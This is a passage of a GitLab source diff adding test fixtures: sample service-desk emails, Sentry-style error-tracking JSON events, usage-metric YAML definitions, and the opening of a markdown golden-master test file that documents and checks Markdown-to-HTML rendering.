2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! 
+ +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_custom_address_reply.eml b/spec/fixtures/emails/service_desk_custom_address_reply.eml new file mode 100644 index 00000000000..7ca17a32267 --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_reply.eml @@ -0,0 +1,24 @@ +Delivered-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! 
+ +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml b/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml new file mode 100644 index 00000000000..1d6f362d3ce --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_x_envelope_to.eml @@ -0,0 +1,24 @@ +X-Envelope-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! 
+ +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_forwarded.eml b/spec/fixtures/emails/service_desk_forwarded.eml index ab509cf55af..45ac419e42f 100644 --- a/spec/fixtures/emails/service_desk_forwarded.eml +++ b/spec/fixtures/emails/service_desk_forwarded.eml @@ -8,7 +8,7 @@ Date: Thu, 13 Jun 2013 17:03:48 -0400 From: Jake the Dog <jake.g@adventuretime.ooo> To: support@adventuretime.ooo Delivered-To: support@adventuretime.ooo -Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=fdskbsf@mail.gmail.com> Subject: The message subject! @all Mime-Version: 1.0 Content-Type: text/plain; diff --git a/spec/fixtures/emails/service_desk_reply.eml b/spec/fixtures/emails/service_desk_reply.eml new file mode 100644 index 00000000000..8e1d9aaf2d3 --- /dev/null +++ b/spec/fixtures/emails/service_desk_reply.eml @@ -0,0 +1,23 @@ +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: incoming+email-test-project_id-issue-@appmail.adventuretime.ooo +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> 
+Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! + +/label ~label2 diff --git a/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml b/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml new file mode 100644 index 00000000000..1629b9a54bc --- /dev/null +++ b/spec/fixtures/emails/valid_new_issue_with_only_quotes.eml @@ -0,0 +1,23 @@ +Return-Path: <jake@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+gitlabhq-gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <jake@adventuretime.ooo> +To: incoming+gitlabhq-gitlabhq-project_id-auth_token-issue@appmail.adventuretime.ooo +Message-ID: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: New Issue by email +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +> This email has 
been forwarded without new content. +> There are only quotes. +> Quote 1 +> Quote 2 diff --git a/spec/fixtures/error_tracking/parsed_event_nullbytes.json b/spec/fixtures/error_tracking/parsed_event_nullbytes.json new file mode 100644 index 00000000000..570a5a329a4 --- /dev/null +++ b/spec/fixtures/error_tracking/parsed_event_nullbytes.json @@ -0,0 +1,175 @@ +{ + "breadcrumbs" : { + "values" : [ + { + "category" : "start_processing.action_controller", + "data" : { + "action" : "error2", + "controller" : "PostsController", + "format" : "html", + "method" : "GET", + "params" : { + "action" : "error2", + "controller" : "posts" + }, + "path" : "/posts/error2", + "start_timestamp" : 1625749156.5553 + }, + "level" : null, + "message" : "", + "timestamp" : 1625749156, + "type" : null + }, + { + "category" : "process_action.action_controller", + "data" : { + "action" : "error2", + "controller" : "PostsController", + "db_runtime" : 0, + "format" : "html", + "method" : "GET", + "params" : { + "action" : "error2", + "controller" : "posts" + }, + "path" : "/posts/error2", + "start_timestamp" : 1625749156.55539, + "view_runtime" : null + }, + "level" : null, + "message" : "", + "timestamp" : 1625749156, + "type" : null + } + ] + }, + "contexts" : { + "os" : { + "build" : "20.5.0", + "kernel_version" : "Darwin Kernel Version 20.5.0: Sat May 8 05:10:33 PDT 2021; root:xnu-7195.121.3~9/RELEASE_X86_64", + "name" : "Darwin", + "version" : "Darwin Kernel Version 20.5.0: Sat May 8 05:10:33 PDT 2021; root:xnu-7195.121.3~9/RELEASE_X86_64" + }, + "runtime" : { + "name" : "ruby", + "version" : "ruby 2.5.1p57 (2018-03-29 revision 63029) [x86_64-darwin19]" + }, + "trace" : { + "description" : null, + "op" : "rails.request", + "parent_span_id" : null, + "span_id" : "4a3ed8701e7f4ea4", + "status" : null, + "trace_id" : "d82b93fbc39e4d13b85762afa2e3ff36" + } + }, + "environment" : "development", + "event_id" : "7c9ae6e58f03442b9203bbdcf6ae904c", + "exception" : { + "values" : [ + { + "module" : 
"ActionView", + "stacktrace" : { + "frames" : [ + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/puma-3.12.6/lib/puma/thread_pool.rb", + "context_line" : " block.call(work, *extra)\n", + "filename" : "puma/thread_pool.rb", + "function" : "block in spawn_thread", + "in_app" : false, + "lineno" : 135, + "post_context" : [ + " rescue Exception => e\u0000\n", + " STDERR.puts \"Error\u0000reached top of thread-pool: #{e.message} (#{e.class})\"\n", + " end\n" + ], + "pre_context" : [ + " end\n", + "\n", + " begin\n" + ], + "project_root" : "/Users/developer/rails-project" + }, + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/puma-3.12.6/lib/puma/server.rb", + "context_line" : " process_client client, buffer\n", + "filename" : "puma/server.rb", + "function" : "block in run", + "in_app" : false, + "lineno" : 334, + "post_context" : [ + " else\n", + " client.set_timeout @first_data_timeout\n", + " @reactor.add client\n" + ], + "pre_context" : [ + " client.close\n", + " else\n", + " if process_now\n" + ], + "project_root" : "/Users/developer/rails-project" + }, + { + "abs_path" : "/Users/developer/.asdf/installs/ruby/2.5.1/lib/ruby/gems/2.5.0/gems/actionview-5.2.6/lib/action_view/path_set.rb", + "context_line" : " find_all(*args).first || raise(MissingTemplate.new(self, *args))\n", + "filename" : "action_view/path_set.rb", + "function" : "find", + "in_app" : false, + "lineno" : 48, + "post_context" : [ + " end\n", + "\n", + " def find_file(path, prefixes = [], *args)\n" + ], + "pre_context" : [ + " end\n", + "\n", + " def find(*args)\n" + ], + "project_root" : "/Users/developer/rails-project" + } + ] + }, + "thread_id" : 70254489510160, + "type" : "ActionView::MissingTemplate", + "value" : "Missing template posts/error2, application/error2 with {:locale=>[:en], :formats=>[:html], :variants=>[], :handlers=>[:raw, :erb, :html, :builder, :ruby, :coffee, :jbuilder]}. 
Searched in:\n * \"/Users/developer/rails-project/app/views\"\n" + } + ] + }, + "extra" : {}, + "fingerprint" : [], + "level" : "error", + "message" : "", + "modules" : { + "concurrent-ruby" : "1.1.9", + "i18n" : "1.8.10", + "minitest" : "5.14.4", + "rake" : "13.0.3", + "thread_safe" : "0.3.6", + "tzinfo" : "1.2.9", + "uglifier" : "4.2.0", + "web-console" : "3.7.0" + }, + "platform" : "ruby", + "release" : "db853d7", + "request" : { + "env" : { + "SERVER_NAME" : "localhost", + "SERVER_PORT" : "4444" + }, + "headers" : {}, + "method" : "GET", + "url" : "http://localhost/posts/error2" + }, + "sdk" : { + "name" : "sentry.ruby.rails", + "version" : "4.5.1" + }, + "server_name" : "MacBook.local", + "tags" : { + "request_id" : "4253dcd9-5e48-474a-89b4-0e945ab825af" + }, + "timestamp" : "2021-07-08T12:59:16Z", + "transaction" : "PostsController#error2", + "user" : {} +} diff --git a/spec/fixtures/error_tracking/python_event_repl.json b/spec/fixtures/error_tracking/python_event_repl.json new file mode 100644 index 00000000000..bb2891c744a --- /dev/null +++ b/spec/fixtures/error_tracking/python_event_repl.json @@ -0,0 +1 @@ +{"breadcrumbs":{"values":[]},"contexts":{"runtime":{"build":"3.9.5 (default, May 12 2021, 15:36:59) \n[GCC 8.3.0]","name":"CPython","version":"3.9.5"}},"environment":"production","event_id":"","exception":{"values":[{"mechanism":null,"module":null,"stacktrace":{"frames":[{"abs_path":"/srv/autodevops/<stdin>","context_line":null,"filename":"<stdin>","function":"<module>","in_app":true,"lineno":2,"module":"__main__","post_context":[],"pre_context":[],"vars":{"__annotations__":{},"__builtins__":"<module 'builtins' (built-in)>","__doc__":"None","__loader__":"<class '_frozen_importlib.BuiltinImporter'>","__name__":"'__main__'","__package__":"None","__spec__":"None","capture_exception":"<function capture_exception at 0x7f5dbb3eb940>","e":"ZeroDivisionError('division by zero')","init":"<function _init at 
0x7f5dbb3ea1f0>"}}]},"type":"ZeroDivisionError","value":"division by zero"}]},"extra":{"sys.argv":[""]},"level":"error","modules":{"appdirs":"1.4.4","apscheduler":"3.7.0","asgiref":"3.3.4","beautifulsoup4":"4.9.3","certifi":"2020.12.5","chardet":"4.0.0","django":"3.2.3","django-anymail":"1.3","django-environ":"0.4.5","django-livereload-server":"0.3.2","django-widget-tweaks":"1.4.8","fcache":"0.4.7","idna":"2.10","mmh3":"3.0.0","pip":"21.1.2","psycopg2-binary":"2.8.6","pytz":"2021.1","requests":"2.25.1","sentry-sdk":"1.5.0","setuptools":"57.0.0","six":"1.16.0","soupsieve":"2.2.1","sqlparse":"0.4.1","tornado":"6.1","tzlocal":"2.1","unleashclient":"4.2.0","urllib3":"1.26.4","uwsgi":"2.0.19.1","wheel":"0.36.2"},"platform":"python","sdk":{"integrations":["argv","atexit","dedupe","django","excepthook","logging","modules","stdlib","threading","tornado"],"name":"sentry.python","packages":[{"name":"pypi:sentry-sdk","version":"1.5.0"}],"version":"1.5.0"},"server_name":"","timestamp":"2021-11-17T14:46:20.898210Z"} diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml index 16ca71f24ae..a5bdd378f53 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml +++ b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric.yml @@ -13,6 +13,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: operational +instrumentation_class: Count performance_indicator_type: distribution: - ce diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml index 060ab7baccf..4931285f6cf 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml +++ 
b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_ee.yml @@ -13,6 +13,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: optional +instrumentation_class: Count performance_indicator_type: distribution: - ee diff --git a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml index e373d6a9e45..39472af686d 100644 --- a/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml +++ b/spec/fixtures/lib/generators/gitlab/usage_metric_definition_generator/sample_metric_with_name_suggestions.yml @@ -14,6 +14,7 @@ introduced_by_url: time_frame: 7d data_source: data_category: optional +instrumentation_class: Count performance_indicator_type: distribution: - ce diff --git a/spec/fixtures/markdown/markdown_golden_master_examples.yml b/spec/fixtures/markdown/markdown_golden_master_examples.yml new file mode 100644 index 00000000000..b024064dc21 --- /dev/null +++ b/spec/fixtures/markdown/markdown_golden_master_examples.yml @@ -0,0 +1,840 @@ +# Related Specs: +# +# This data file drives the specs in the following specs: +# +# CE Backend: spec/requests/api/markdown_golden_master_spec.rb +# CE Frontend: spec/frontend/content_editor/markdown_processing_spec.js +# +# For EE, these files are used: +# EE Data: ee/spec/fixtures/markdown/markdown_golden_master_examples.yml +# EE Backend: ee/spec/requests/api/markdown_golden_master_spec.rb +# EE Frontend: ee/spec/frontend/content_editor/ee_markdown_processing_spec.js +# +# +# Requirements: +# +# 1. Frontend: We should have test coverage that the Content Editor can properly serialize HTML +# to Markdown for all GFM source elements which it currently supports. +# 2. 
Frontend: We should have test coverage that the Content Editor can properly render the expected +# HTML for all GFM source elements which it currently supports (not currently implemented in the +# frontend - this will likely be a standalone module outside of the Content Editor). +# 3. Backend: We should ensure that for all GFM elements, the backend always renders the expected +# HTML, for **all** supported GFM source elements. +# +# If any of this ever changes unexpectedly, tests will start failing, and force the same change +# to be made on the backend and frontend. +# +# +# Overview: +# +# These specs ensure that the bidirectional Markdown <-> HTML conversion logic is implemented +# identically on the backend and frontend, for all supported GitLab-Flavored Markdown examples, by +# running hardcoded examples through the logic and ensuring the results match. +# +# This is an example of the "Golden Master Testing" approach, which is also referred to as +# "Approval Testing" or "Characterization Testing". +# +# The term "Golden Master" originally comes from the recording industry, and refers to the process +# of "mastering", or making a final mix from which all other copies will be produced. +# +# See: +# - https://en.wikipedia.org/wiki/Characterization_test +# - https://en.wikipedia.org/wiki/Gold_master_(disambiguation) +# +# +# What we are doing is actually a type of Golden Master testing with modifications: +# +# 1. The original markdown examples used to drive the tests are taken from this YAML, and can be +# considered a form of "fixture" in this case. +# 2. The HTML in the YAML is the "Golden Master", but we are going to use it to assert +# against **TWO** different implementations of markdown rendering: +# 1. The frontend, implemented as Jest specs. +# 1. This will assert both HTML -> markdown serialization (what it currently does), as well as... +# 2.
Markdown -> HTML rendering (not currently implemented in the frontend - this will likely +# be a standalone module outside of the Content Editor) +# 1. The backend, implemented as request specs +# 1. This will assert markdown -> HTML conversion by the backend. +# +# Also see the MR for more explanation on the details of this approach: +# https://gitlab.com/gitlab-org/gitlab/-/merge_requests/68671 +# +# +# Usage: +# +# * Please keep this file alphabetized. +# * To run focused example(s), set the `FOCUSED_MARKDOWN_EXAMPLES` environment variable to a +# comma-separated list of example names. This works for the frontend and backend specs. +# * Required attributes for every example: +# 1. `name`: Specifies the Name of the example, which will be printed when specs are run. +# 2. `markdown`: Specifies the Markdown for the example, which will be compared with the +# Markdown the code generates from the corresponding specified HTML. +# 3. `html`: Specifies the HTML for the example, which will be compared with the +# HTML the code generated from the corresponding specified Markdown. +# * `api_context` (optional): This is used when a single markdown can be +# rendered differently depending on the API endpoint or area of the app from which it is called or +# used. The valid values for `api_context` are: `project`, `group`, `project_wiki`, +# and (for EE only) `group_wiki`. The `name` attribute must also have a `_for_[API_CONTEXT]` suffix +# which matches the `api_context`, in order to ensure that each example has a unique `name` +# identifier. For example, `attachment_image_for_project`. +# * `pending`: To skip an example that is broken or not yet fully implemented, add +# a `pending: <reason with issue/MR URL>` attribute to the example. See +# the `an_example_of_pending` entry for an example. +# * `pending` with key: You can also mark an example pending on only the frontend or backend. See +# the `an_example_of_pending_with_keys` entry for an example.
+# * `substitutions`: For examples which may have variable content in different environments, +# such as portions of the URI, or database record IDs, you can specify +# `substitutions`, which is an array of regex/replacement pairs. The HTML +# value will be normalized with each of these pairs using Ruby `gsub` +# before comparing. +# The substitution values can (and are) also reused in multiple examples +# via YAML anchors. +# +# +# Notes: +# +# * The html values should exactly match what the backend markdown API endpoints return for the +# given markdown example. The HTML is intentionally not indented, formatted, or split across lines. +# This is a bit less readable, but it makes the spec logic simpler and less error prone for edge +# cases. +# +# +# Debugging Failures and Writing New Entries: +# +# * You need to compare what is different between the expected and actual values. +# * In rspec, the diff printed out includes the full text of the HTML. This may be long, so you +# may want to turn line wrapping on or off or copy the diff to separate file(s) for easier comparison. +# * If the difference is just in an attribute value, use the `substitutions` support to normalize +# the HTML before comparing. These specs are only validating the HTML structure, the individual +# markdown elements' unit tests can provide coverage that the exact attribute values are correct. +# * If you are making a new entry, you can create the entry according to the `Usage` section above, +# but leave the `html` value blank. This will cause the spec to fail, and you can fill in the +# `html` value based on the spec failure that is printed out. 
+ +--- +#- name: an_example_of_pending +# pending: 'This is an example of the pending attribute: http://example.com' +# markdown: ;) +# html: |- +# <blink data-sourcepos="1:1-1:2"/></blink> +# + +#- name: an_example_of_pending_with_keys +# pending: +# frontend: 'This is an example of the frontend-only pending attribute: http://example.com' +# backend: 'This is an example of the backend-only pending attribute: http://example.com' +# markdown: ;) +# html: |- +# <blink data-sourcepos="1:1-1:2"/></blink> + +- name: attachment_image_for_group + api_context: group + substitutions: + # Note: having the top level `substitutions` data structure be a hash of arrays + # allows us to compose multiple substitutions via YAML anchors (YAML anchors + # pointing to arrays can't be combined) + uri_substitution: &uri_substitution + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. + - regex: '(href|data-src)(=")(.*?)(test-file\.(png|zip)")' + replacement: '\1\2URI_PREFIX\4' + markdown: |- + ![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png) + html: |- + <p data-sourcepos="1:1-1:69" dir="auto"><a class="no-attachment-icon gfm" href="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-link="true"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="test-file" class="lazy gfm" data-src="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png"></a></p> + +- name: attachment_image_for_project + api_context: project + substitutions: + uri_substitution: *uri_substitution + markdown: |- + ![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png) + html: |- + <p 
data-sourcepos="1:1-1:69" dir="auto"><a class="no-attachment-icon gfm" href="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-link="true"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="test-file" class="lazy gfm" data-src="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png"></a></p> + +- name: attachment_image_for_project_wiki + api_context: project_wiki + substitutions: + uri_substitution: *uri_substitution + markdown: |- + ![test-file](test-file.png) + html: |- + <p data-sourcepos="1:1-1:27" dir="auto"><a class="no-attachment-icon" href="/group1/project1/-/wikis/test-file.png" target="_blank" rel="noopener noreferrer" data-canonical-src="test-file.png"><img alt="test-file" class="lazy" data-src="/group1/project1/-/wikis/test-file.png" data-canonical-src="test-file.png"></a></p> + +- name: attachment_link_for_group + api_context: group + substitutions: + uri_substitution: *uri_substitution + markdown: |- + [test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip) + html: |- + <p data-sourcepos="1:1-1:68" dir="auto"><a href="/groups/group58/-/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-link="true" class="gfm">test-file</a></p> + +- name: attachment_link_for_project + api_context: project + substitutions: + uri_substitution: *uri_substitution + markdown: |- + [test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip) + html: |- + <p data-sourcepos="1:1-1:68" dir="auto"><a href="/group58/project22/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-canonical-src="/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip" data-link="true" 
class="gfm">test-file</a></p> + +- name: attachment_link_for_project_wiki + api_context: project_wiki + substitutions: + uri_substitution: *uri_substitution + # TODO: The current frontend example doesn't include the path, need to look into why it does after refactoring to the new golden master approach + pending: + frontend: 'The current frontend example doesnt include the path, need to look into why it does after refactoring to the new golden master approach' + markdown: |- + [test-file](test-file.zip) + html: |- + <p data-sourcepos="1:1-1:26" dir="auto"><a href="/group1/project1/-/wikis/test-file.zip" data-canonical-src="test-file.zip">test-file</a></p> + +- name: audio + markdown: |- + ![Sample Audio](https://gitlab.com/gitlab.mp3) + html: |- + <p data-sourcepos="1:1-1:46" dir="auto"><span class="media-container audio-container"><audio src="https://gitlab.com/gitlab.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/gitlab.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></p> + +- name: audio_and_video_in_lists + markdown: |- + * ![Sample Audio](https://gitlab.com/1.mp3) + * ![Sample Video](https://gitlab.com/2.mp4) + + 1. ![Sample Video](https://gitlab.com/1.mp4) + 2. 
![Sample Audio](https://gitlab.com/2.mp3) + + * [x] ![Sample Audio](https://gitlab.com/1.mp3) + * [x] ![Sample Audio](https://gitlab.com/2.mp3) + * [x] ![Sample Video](https://gitlab.com/3.mp4) + html: |- + <ul data-sourcepos="1:1-3:0" dir="auto"> + <li data-sourcepos="1:1-1:43"><span class="media-container audio-container"><audio src="https://gitlab.com/1.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/1.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></li> + <li data-sourcepos="2:1-3:0"><span class="media-container video-container"><video src="https://gitlab.com/2.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/2.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></li> + </ul> + <ol data-sourcepos="4:1-6:0" dir="auto"> + <li data-sourcepos="4:1-4:44"><span class="media-container video-container"><video src="https://gitlab.com/1.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/1.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></li> + <li data-sourcepos="5:1-6:0"><span class="media-container audio-container"><audio src="https://gitlab.com/2.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/2.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span></li> + </ol> + <ul data-sourcepos="7:1-9:47" class="task-list" dir="auto"> + <li data-sourcepos="7:1-7:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container audio-container"><audio src="https://gitlab.com/1.mp3" controls="true" data-setup="{}" 
data-title="Sample Audio"></audio><a href="https://gitlab.com/1.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span> + </li> + <li data-sourcepos="8:1-8:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container audio-container"><audio src="https://gitlab.com/2.mp3" controls="true" data-setup="{}" data-title="Sample Audio"></audio><a href="https://gitlab.com/2.mp3" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Audio'">Sample Audio</a></span> + </li> + <li data-sourcepos="9:1-9:47" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> <span class="media-container video-container"><video src="https://gitlab.com/3.mp4" controls="true" data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/3.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span> + </li> + </ul> + +- name: blockquote + markdown: |- + > This is a blockquote + > + > This is another one + html: |- + <blockquote data-sourcepos="1:1-3:21" dir="auto"> + <p 